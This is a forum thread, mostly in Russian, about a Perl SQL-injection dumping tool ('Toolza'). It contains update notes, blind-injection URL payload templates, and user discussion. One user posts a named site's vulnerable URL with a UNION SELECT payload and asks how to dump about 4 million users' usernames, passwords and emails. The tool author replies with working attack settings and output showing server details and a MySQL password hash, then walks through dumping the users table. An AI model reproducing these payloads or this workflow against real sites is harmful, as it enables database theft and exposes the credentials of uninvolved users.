update:======>download Исправлены существенные ошибки в floor(rand()) методе, теперь ничего не пропускает и работает как положено.
update:======>download Добавлены некоторые возможности в Blind-sql inj для различных ситуаций: Code: ################################################################################ ## Blind SQL-injection настройки | Blind SQL-injection settings## ################################################################################ $bl_mode = 0; # mode of blind sql injection: #----------------------------------------------------------------------------------------------------------------- # mode 0 example - http://site.com/index.php?id=1+and+substring(version(),1,1)=5--+ #in script: #$bl_url = "http://site.com/index.php?id=1"; #$bl_filtr = "--+"; #$bl_plus = "+"; #$bl_error = "here_wrong_message"; #$bl_error_type = 0; #----------------------------------------------------------------------------------------------------------------- # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2)) #in script: #$bl_url = "http://site.com/index.php?id=1+and+1=if((select"; #$bl_filtr = "),1,(select+1+union+select+2))"; #$bl_plus = "+"; #$bl_error = "here_wrong_message"; #$bl_error_type = 0; #----------------------------------------------------------------------------------------------------------------- т.е. если у вас так или иначе в рабочем запросе присутствует "substring(version( ),1,1)=5" (ну 5 тут понятно, меняется) - то можно юзать в тулзе независимо от навороченности конструкции PS: Можно было бы сделать и проще, без разных режимов, но сделал добавление только из расчета того, чтобы юзеры, которые пользовали прогу раньше, не путались
на днях раскручивал тулзой блинд. бага: парочку букв нашлось неверно, некоторые оказались = ? возможно это связано с глюками потоков. раньше, через [LFI/Reader/Load_file() - unvisual error when wrong query] замечал глюк с неверным отображением найденного файла, пример вывода: ==================================== //etc/passwd ==================================== мусор ==================================== //logs/error.log ==================================== данные из /etc/passwd какой-то подозрительный нюанс тулза делает так: GET http://site/path ... а браузеры так: GET /path ... предложение фичи учитывая, что интересуют нас обычно строго определенные значения таблиц и полей, и то, что блинд занимает туеву хучу трафика и логов, можно добавить условие в выборку [на имя колонок, на имена таблиц], по типу: условие на колонку = pass => select column_name from information_schema.columns where instr(lower(column_name), 0x70617373) > 0; + предопределенные условия на table_schema != information_schema table_schema != mysql [ее доступность вообще одним отдельным запросом проверять] предложение фичи [непринципиально, но уж точно полезно ] сделать сохранение уже сграбленных данных для последующего использования, а то при каждом новом выборе в меню часто грабятся сначала те же данные, что уже и были сграблены.
Иногда это связано с фактической стабильностью соединения с сайтом (именно поэтому не стал внедрять sleep метод, кто часто крутит блинду - поймет почему, способ вообще нерабочий на практике в 50% случаев, а то и больше), иногда с шириной вашего интернет канала, иногда потому что луна светит ярче обычного. А иногда и от кол-ва потоков, еще раз напоминаю - 10 максимум, глюки - уменьшать кол-во потоков, в блинде фаст мод юзать только на локалхосте, в остальных случаях - нормал. POST безопаснее чем GET, но и, опять же по практике - более глючный (как раз касается моментов, когда данные пропускаются или заменяются на какую-нибудь фигню) Работает? Работает. Вывод - так тоже можно. Т.е. не грузись по этому поводу. так и есть, с самого начала, вы просто не знаете, как это юзать, очевидно. Указывайте нужные вам таблицы/колонки ручками - и будет вам счастье. Ааа, дошло, вам like подавай. Удобная фича, но пока нет Чего? Все пишется в файло на любом этапе (*nix), в Win - только после завершения задачи. Одни и теже данные не грабятся, это гонево. Кому нравится крутить блинду ручками - у нас свободная страна)
Насколько я помню, в документации HTTP указано по этому поводу, что допускаются и полные ссылки. В этом случае можно избегать или игнорировать заголовок HOST, поскольку домен уже указан в URI.
В стандарте http1.1 указано, что полный uri обязателен при работе через прокси. Но вполне может быть, что автор тулзы приверженец карго-культа и его это не волнует.
Hi i am using this tool and it is very nice but here is one problem i want to extract specific DATABASE data but i can not do that how can i do that please help me and i want to extract users and it is 4Million users so any fast Dumper or Tool for extract fastly if have please share me Thanks
Vulnerable link http://slingogaming.com/slingo_casino_news-story.php?id=-1+UNION+SELECT+1-- Database : phase8 Table : users columns : username : password : email i want to extract this Database Data but i can not extract from Toolza And this users data is 4Million Data and i want to extract fast if any good method so i can extract fast please solve this problem Thank you
What's the problem? Settings in toolza.pl: Code: $method = 1; $source_sql = "http://slingogaming.com/slingo_casino_news-story.php?id=-1+UNION+SELECT+^"; $filtr = "--"; $plus = "+"; $limit = 0; $unhex = 0; $aes = 0; $aes_key = "0x71"; results: Code: System information: ---------------------- ver:5.0.27-max base:slingo_db user:[email protected] basedir:/ datadir:/var/lib/mysql/ tmpdir:/tmp/ os:pc-linux-gnu mysql.user:phpuser mysql.password:36684d606dccb590 file_priv:Y Tables in information_schema.tables - 294
yes it is working file but problem is that i can not extract specific Database like this DATABASE Database : phase8 Table : users columns : username : password : email how can i extract its Database Columns Data Thank you
Choose mode: ---------------------------------------------------------- [1] Mysql inj system information [2] Mysql inj get DB-names from information_schema.schemata [3] Mysql inj get tables from DB-name [4] Mysql inj get column_name from tables from DB-name [5] Mysql inj get tables from information_schema (current DB) [6] Mysql inj get column_name from table (current DB) [7] Mysql inj get data from columns [8] Mysql inj brute tables & columns [9] Mysql inj column number bruter [10] Mysql inj Blind [11] Mysql inj NAME_CONST [12] Mysql inj floor(rand()) ---------------------------------------------------------- [13] Main menu ---------------------------------------------------------- 7 Your choice: 7 ----------------------------------------- Enter the table_name: phase8.users ----------------------------------------- MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): 0 Table: phase8.users ---------- ----------------------------------------- Enter the column(s) name(s) - for example - id or id,username,user_password: username,password,email Dump column(s): [ username,password,email ] from [ phase8.users ] ----------------------------------------- Do you want add condition to sql-query? ---------- for example - where id=1, where username=admin (no quotes) ? (1/0):If no condition - ENTER or 0 here ---------- Count data from [ phase8.users ] 4172356 ---------- Get ALL data from phase8.users (4172356) ? (1/0): 0 Enter START_position: 0 Enter END_position: 1 Dump records from [0] to [1] ---------------------- ......data here.......
=> нет, я про [10] Mysql inj Blind => [3] Blind inj get tables from DB-name [4] Blind inj get column_name from tables from DB-name [6] Blind Get tables from information_schema (current DB) [7] Blind Get column_name from table (current DB) зачем грабить все колонки и таблицы, если можно условием ограничить их выбор - вхождение нужной подстроки в имя колонки или имя таблицы [6] Blind Get tables from information_schema (current DB) => Your choice: 6 ----------------------------------- Count tables NOT in information_schema [length]:2 33 ------------------------------------------------------ Count tables NOT in information_schema [value]:33 ------------------------------------------------------- Fri Jun 18 11:14:25 2010 ----------------------------------- Normal MODE - records > 10 Fast MODE - records <= 10 ----------------------------------------- Get ALL tables (33) ? (1/0): 0 Enter START_position: 1 Enter END_position: 5 Dump records from [1] to [5] ----------------------------------------- ... нужных мне данных не оказалось, выбираю по новой [6] Blind Get tables from information_schema (current DB) опять идет грабание данных [опредление Count tables NOT in information_schema [length]:2 Count tables NOT in information_schema [value]:33 ] , которые уже были до этого сграбаны, а можно было бы просто запомнить и использовать уже готовые с предыдущего выбора [кстати, как ты в твоей предыдущей мессаге вывод скрин консоли снимал ? я в винде через выделение через [Изменить]->[Пометить], но возможно есть более удобные фичи или программы, которые автоматом сохраняют весь вывод консоли в файл ?]
Просто выделить и скопировать. Как из браузера. Ми делал в бубунте. Тут принцип limit, если с первой - то Enter START_position: 0 А. Теперь понятно. Ну да, так бы было правильнее конечно. Только если ты не знаешь ГДЕ именно (под каким номером) твоя таблица - смысл дампить кусками? Увидел нужную в итоге - прервал прогу. Т.е. просто запустить гет алл тэйблс. Т.е. чото логику недопонимаю такого кусочного дергания в данном случае. ну это like и есть, в тулзе пока этого нет
если таблиц очень много, то времени и трафика это занимает дофигище. я иногда смотрю кусками. насчет прерывать - в винде в таком случае не сохраняется лог. [у тебя похоже привычка считать собеседника немножко дауном ? если кто-то что-то как-то делает, то у него есть для этого объективная причина. хотя, возможно, ты привык к "попугаям", которые не понимают того, чего делают но какой смысл каждого по дефолту принимать именно за него ? ]
Ничего подобного. Просто у меня такая манера общения (кстати перечитал посты - чото наездов или чего-то еще оскорбительного по отношению к тебе не увидел). Наверное ты так воспринимаешь просто. PS: Заранее всех уважаю и прошу прощения у тех, кого ненароком обидел/задел PPSS: Просто это не прога на продажу, и уж если хотите получить правильный ответ сразу - просьба выкладывать МАКСИМАЛЬНО иноформацию по интересующей вас проблеме, а не растягивать на несколько постов, заставляя меня думать, что вам собственно нужно вообще в итоге.